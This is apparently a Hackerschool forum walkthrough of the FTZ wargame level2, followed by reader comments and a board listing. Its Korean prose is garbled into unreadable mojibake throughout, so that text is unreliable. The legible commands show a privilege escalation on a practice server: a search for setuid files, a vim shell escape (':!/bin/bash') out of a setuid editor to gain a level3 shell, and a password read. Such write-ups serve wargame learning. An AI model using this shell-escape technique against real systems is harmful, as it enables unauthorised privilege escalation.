1606, 1/81 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   °áºù
   ÇØÄð level2 °­ÀÇ

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1229 [º¹»ç]


¾È³çÇϼ¼¿ë... À̹ø¿¡ óÀ½ ±ÛÀ» ¿Ã¸®´Â "°áºù"ÀÔ´Ï´Ù...
Æ®·¹À̳ʸ¦ ¼ö·áÇصµ levelÇØÅ·À» ÀüÇô ÇÒÁÙ ¸ð¸£°Ú´Ù!
±×·³ ÀÌ ±ÛÀ» º¸¼¼¿ë ¤¾¤¾
=========================================================

login as: level2
level2@ftz.hackerschool.org's password:ºñ¹øÀº ¾Æ½Ã°ÚÁÒ? ¤¾¤¾

[level2@ftz level2]$ ls -l
total 16
-rw-r--r--    1 root     root           60 Mar 23  2000 hint
drwxr-xr-x    2 root     level2       4096 Feb 24  2002 public_html
drwxrwxr-x    2 root     level2       8192 Jul  5 21:31 tmp

#ÀÏ´Ü hint ÆÄÀÏÀÌ ÀÖ´ÂÁö »ìÆ캾´Ï´Ù....
#hint ÆÄÀÏÀÌ Àֳ׿ä! ±×·¯¸é ÈùÆ®¸¦ ºÁ º¾½Ã´Ù!

[level2@ftz level2]$ cat hint


ÅؽºÆ® ÆÄÀÏ ÆíÁýÁß ½©ÀÇ ¸í·ÉÀ» ½ÇÇà½Ãų ¼ö Àִٴµ¥...

#ÈùÆ®¸¦ º¾½Ã´Ù... ÅؽºÆ® ÆÄÀÏ ÆíÁýÁß¿¡ ½©ÀÇ ¸í·ÉÀ» ½ÇÇà½Ãų¼ö ÀÖ´ÙÁÒ?
#±×·³ setUID ÆÄÀÏÀÌ ÀÖ´ÂÁö find ¸í·É¾î·Î ã¾Æº¾½Ã´Ù...


[level2@ftz level2]$ find / -perm -4000 -user level3 2> /dev/null

#ÀÚ... Çϳª ³ª¿Ô³×¿ä...

/usr/bin/editor

#¿¡µðÅͶó....Çѹø ½ÇÇàÇØ º¾½Ã´Ù....

[level2@ftz level2]$ /usr/bin/editor

#ÀÚ!ÀÌÁ¦ VIMÀÌ ³ª¿É´Ï´Ù... VIMÀº
#¸®´ª½º ´ëÇ¥ÅؽºÆ® ¿¡µðÅÍÀä...
#¿ì¸®´Â ÀÌ·¸°Ô »ý°¢ÇսôÙ.. À©µµ¿ìÁî¿£ ¸Þ¸ðÀåÀÌ ÀÖ´Ù¸é!
#¸®´ª½º¿¡´Â VIMÀÌ ÀÖ´Ù!!
#VIâÀ» º¾½Ã´Ù...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~

#ÀÌ·¸°Ô µÇÀÖ½À´Ï´Ù...

#¾Æ±î °Ë»öÇßÀ»¶§ ÀÌ ÆÄÀÏ¿£ setUID°¡ °É·ÁÀÖ¾ú½À´Ï´Ù..
#´Ù½Ã¸»ÇØ ÀÌÆÄÀÏÀ» ½ÇÇàÁß¿¡´Â level3ÀÇ ±ÇÇÑÀ¸·Î ½ÇÇàµÈ´Ù´Â °ÍÀÌÁÒ...
#º¾½Ã´Ù.. VIM»ç¿ë¹ýÁß¿¡ ÅؽºÆ® ÆíÁýÁß ÆÄÀÏÀ» ½ÇÇàÇÒ¼ö ÀÖ´Ù´Â°É ¾Æ½Ê´Ï±î?
#(Esc)¸¦ ´©¸£°í´À³¦Ç¥(!)¸¦ µÎ¹ø ÀÔ·ÂÇÏ¿©ÁÝ´Ï´Ù...
#±×·³ ¹Ø¿¡ ":.!"¶ó°í Ç¥½ÃµÉ°ÍÀÔ´Ï´Ù...
#±×·³ ¿¹¸¦ º¾½Ã´Ù...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~
:.!

#¡èº¸À̽ÃÁÒ? ÀÚ ÀÌÁ¦ ¿©±â ½©¸í·ÉÀ» ÀÔ·ÂÇØ ÁݽôÙ....

:.!

#ÇÏÁö¸¸ ±×´ë·Î ÇÏ¸é ¿À·ù°°Àº°Ô ¶å´Ï´Ù...

shell returned 127

Hit ENTER or type command to continue

#¶ó°í ¶å´Ï´Ù.... ÀÚ ¹®Á¦´Â

:.!

#¿©±â ÀÖ½À´Ï´Ù... º¸¼¼¿ä... ¸í·É¾î´Â !/file À̶óÇߴµ¥

:!

#ÀÌ·¸°Ô °íÃÄÁÝ´Ï´Ù.... ±×¸®°í ½© ¸í·É¾î¸¦ ÀÔ·ÂÇÕ´Ï´Ù....

:!/bin/bash

#¶Ç´Â

:!sh

#±×·³ ·¹º§ 3ÀÇ ±ÇÇÑÀ» ¾ò°ÔµË´Ï´Ù

[level3@ftz level2]$

#ÀÌÁ¦ ¹»ÇؾßÇÒÁö ¾Æ½Ã°ÚÁÒ?
#my-pass¸í·É¾î·Î ·¹º§ 3 Æнº¿öµå¸¦ ¾Ë¾Æ³À´Ï´Ù...

[level3@ftz level2]$ my-pass

#Æнº¿öµå âÀÌ ¶å´Ï´Ù...

Level3 Password is "************".

[level3@ftz level2]$

#Æнº¿öµå´Â *·Î ä¿ü½À´Ï´Ù... level2´Â ºñ±³ÀÛ ½¬¿ì´Ï
#Àڱ⠽ǷÂÀ¸·Î Ç®¾îº¾½Ã´Ù!
  Hit : 13207     Date : 2009/07/07 04:39


    
sjk1213 ´Ï¸¶ ÀÌ°Å ºñ¹ø ÀÔ·Â ÇÒ¶§ µû¿ÈÇ¥µµ ÀÔ·ÂÇØ¾ß Çϳª¿ä? Àú ±×°Í¶§¹®¿¡ Áö±Ý ¸î¹øÀ» ºñ¹ø Ãƴµ¥ ·¹º§3¿¡ Á¢¼ÓÀÌ ¾ÈµÇ°í ÀÖ¾î¿ä.¤Ì.¤Ñ 2009/07/08  
°áºù ¤¤ ¤¾¤¾ ºñ¹ø ÀÔ·ÂÇÒ¶§, Å«µû¿ÈÇ¥ÀԷ±îÁö ÇÒ ÇÊ¿ä´Â ¾ø´ä´Ï´Ù^^ 2009/07/10  
pds7724 ¤¾¤¾ ÀÌ°Ç ´äÀ» ´Ù ¾Ë·ÁÁÖ´Â °ÍÀεð^^ 2009/07/23  
ssake2002 level1À̶û ºñ½ÁÇѵí...?
±×·¡µµ ¾î·Á¿ö~		 2009/07/26  
°áºù pds´Ô Á˼ÛÇØ¿ä ¤Ð¤Ð 2009/07/30  
hse9422 Àü Çصµ Çصµ '[level2@ftz level2]$'¶ó°í
ÇÁ·ÒÇÁÆ®°¡ ¹Ù²îÁú ¾Ê´Âµ¥...		 2009/07/30  
hse9422 ¤¸¤µ Á¦°¡ À߸øÇß´ø°ÅÀÓ.. ½ÇÇàÀ» ½ÃÅ°´Â °Å¿´´Âµ¥ ¸¸µé°í ÀÖ¾ú³×¿ä.. ¤»¤» ¤¸¤µ 2009/07/30  
°áºù ¤¤ ¤¾¤¾¤¾¤¾°µÂ÷³ª¿ä ´Ù±×·²¼ö ÀÖ´Â°Å´Ï ¤¾ 2009/08/01  
islhoeve ¿ö¾î¾î..¾î·Æ´Ù..¤¾¤¾ 2011/04/04  
rlduq1993 /usr/bin/editorÀ» Ä¡¸é Çã°¡ °ÅºÎµÊÀ̶ó°í µå³×¿ä. 2011/11/29  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 20008
1605   ARP ½ºÇªÇÎ - Part.1 -     ÇØÅ·ÀßÇÏ°í½Í´Ù
 04/20 67
1604   http ½º´ÏÆÛ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
 04/20 39
1603   pcapÀ¸·Î ÆÐŶ ½º´ÏÆÛ ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
 04/20 42
1602   ÇØÄ¿½ºÄ𠸸ȭÀÇ ÀÚµ¿À¸·Î ½ºÄµÇÏ´Â ÇÁ·Î±×·¥     ÇØÅ·ÀßÇÏ°í½Í´Ù
 02/18 487
1601   ½Ã½ºÅÛ ÄÝ ÃßÀû È®ÀåÆÇ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/19 638
1600   °£´ÜÇÑ ½Ã½ºÅÛ ÄÝ ÃßÀû ÇÁ·Î±×·¥ ¸¸µé±â     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/18 625
1599   [overthewire.org] - leviathan1     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/14 958
1598   [overthewire.org] - leviathan0     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/14 682
1597   [Write Up] Crypto Cat's CTF 2024 - BabyFlow     ÇØÅ·ÀßÇÏ°í½Í´Ù
 12/29 657
1596   [pwnable.kr] bof     ÇØÅ·ÀßÇÏ°í½Í´Ù
 12/25 686
1595   [pwnable.kr] Shellshock[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 790
1594   ShellshockÀÇ ±âº» ¿ä¾à     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 766
1593   [pwnable.kr] fd     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 758
1592   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/22 700
1591   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/22 786
1590   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/20 727
1589   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/20 561
1588   [pwnable.kr] cmd1 °ø·«     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/23 738
1587   netdiscover ÆÄÀ̽ãÀ¸·Î ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/13 911
1 [2][3][4][5][6][7][8][9][10]..[81]

Copyright 1999-2025 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org